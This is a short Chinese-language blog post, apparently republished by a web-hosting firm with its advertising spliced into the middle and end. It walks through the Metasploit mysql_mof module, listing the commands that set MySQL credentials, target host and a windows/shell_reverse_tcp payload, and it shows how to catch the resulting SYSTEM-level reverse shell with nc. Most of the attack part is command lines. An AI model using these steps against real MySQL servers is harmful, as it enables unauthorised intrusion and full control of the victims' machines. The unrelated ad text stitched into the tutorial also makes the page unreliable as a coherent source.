mysqlmof+metasploit反弹shell-创新互联

鉴于上篇文章 http://z2ppp.blog.51cto.com/11186185/1975985 mysql mof提权

在安图等地区,都构建了全面的区域性战略布局,加强发展的系统性、市场前瞻性、产品创新能力,以专注、极致的服务理念,为客户提供成都网站建设、网站建设 网站设计制作按需求定制制作,公司网站建设,企业网站建设,品牌网站建设,营销型网站建设,成都外贸网站建设公司,安图网站建设费用合理。

metasploit已经有针对该方式的利用代码,原理还是一样生成mof文件,只是metasploit中可以使用到反弹技术,就不用额外添加用户,前提是对方服务器允许访问公网

use exploit/windows/mysql/mysql_mof set password xxx    //设置登录mysql的密码 set username xxx    //设置登录mysql的用户 set rhost xxx       //设置要登录的ip地址 set rport xxxx      //设置mysql的端口号 set payload windows/shell_reverse_tcp    //所使用的反弹模块 set lhost xxx       //反弹到的ip地址 set lport xxx       //反弹到的端口 show options        //设置完成后,使用该命令可查看设置参数情况 exploit             //执行

mysql mof+metasploit反弹shell

如没问题,即exploit执行

这边我们使用nc监听对应端口号,就可以接收到shell了,通常情况为system权限,因为mof文件是由system执行

mysql mof+metasploit反弹shell

错误之处,敬请指正

另外有需要云服务器可以了解下创新互联cdcxhl.cn,海内外云服务器15元起步,三天无理由+7*72小时售后在线,公司持有idc许可证,提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案,具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势,专为企业上云打造定制,能够满足用户丰富、多元化的应用场景需求。


本文名称:mysqlmof+metasploit反弹shell-创新互联
本文路径:http://ybzwz.com/article/jdhdj.html